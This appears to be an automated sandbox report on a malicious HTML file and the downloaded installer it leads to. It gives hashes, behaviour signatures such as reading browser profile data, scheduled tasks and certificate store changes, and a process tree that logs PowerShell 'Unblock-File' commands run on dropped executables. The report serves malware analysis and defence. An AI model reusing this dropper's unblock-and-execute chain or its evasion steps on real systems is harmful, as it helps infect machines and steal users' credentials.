Analysis
-
max time kernel
255s -
max time network
464s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
-
submitted
30/06/2024, 12:17
General
-
Target
EirvCa52607692eb999d010fba6a306ace4db817ec236.html
-
Size
2KB
-
MD5
86d1a2d2c9898d3d41a84564091088c4
-
SHA1
4926bfc861aa93eb33069a062342493c6dfe45a9
-
SHA256
b0bf8eb9ee960ca4fc2c3e76a3bfedb02043786c3b7a85f52183483d1fdf07de
-
SHA512
af253ca009a6dbbcae258ed6fd9dd3f2a43544ca88125237f743a2351d8d5520344a511faf21191ca8c89bc91fd6af715a414060ed2ee813f6d8ba5645f53ec8
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 19 IoCs
-
Loads dropped DLL 22 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
-
NSIS installer 2 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Modifies registry class 17 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
NTFS ADS 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 49 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of FindShellTrayWindow 38 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\EirvCa52607692eb999d010fba6a306ace4db817ec236.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff960003cb8,0x7ff960003cc8,0x7ff960003cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3300 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1724 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1964 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3032 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,15111133298568187120,5818629349788650170,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\setup_ne9O3iNgSh\setup_ne9O3iNgSh.exe"C:\Users\Admin\Downloads\setup_ne9O3iNgSh\setup_ne9O3iNgSh.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P2C7B.tmp\setup_ne9O3iNgSh.tmp"C:\Users\Admin\AppData\Local\Temp\is-P2C7B.tmp\setup_ne9O3iNgSh.tmp" /SL5="$3027A,6623169,56832,C:\Users\Admin\Downloads\setup_ne9O3iNgSh\setup_ne9O3iNgSh.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Lame_WAV_6301"3⤵
-
-
C:\Users\Admin\AppData\Local\Lame WAV\lamewav.exe"C:\Users\Admin\AppData\Local\Lame WAV\lamewav.exe" d3b66f978666060e329770269ce85a933⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 8804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 8884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 9444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 10924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 9004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 8844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 16324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 16844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 9484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 17444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 18244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 17284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 18124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 19684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 17204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 21444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 21204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 21524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 22124⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\uSyXFTmG\wS6Kva1R.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\uSyXFTmG\wS6Kva1R.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 21924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 21964⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\9QEcg3do\p92oq.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\9QEcg3do\p92oq.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\fNT63P1i\Db6zB8aLoGggRqEiWYIG.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\fNT63P1i\Db6zB8aLoGggRqEiWYIG.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 22724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23084⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 22884⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\9QEcg3do\p92oq.exeC:\Users\Admin\AppData\Local\Temp\9QEcg3do\p92oq.exe /sid=3 /pid=5654⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2808 --field-trial-handle=2812,i,8749040385625566762,16448139243447875464,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 --field-trial-handle=2812,i,8749040385625566762,16448139243447875464,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3444 --field-trial-handle=2812,i,8749040385625566762,16448139243447875464,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3572 --field-trial-handle=2812,i,8749040385625566762,16448139243447875464,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:210⤵
-
-
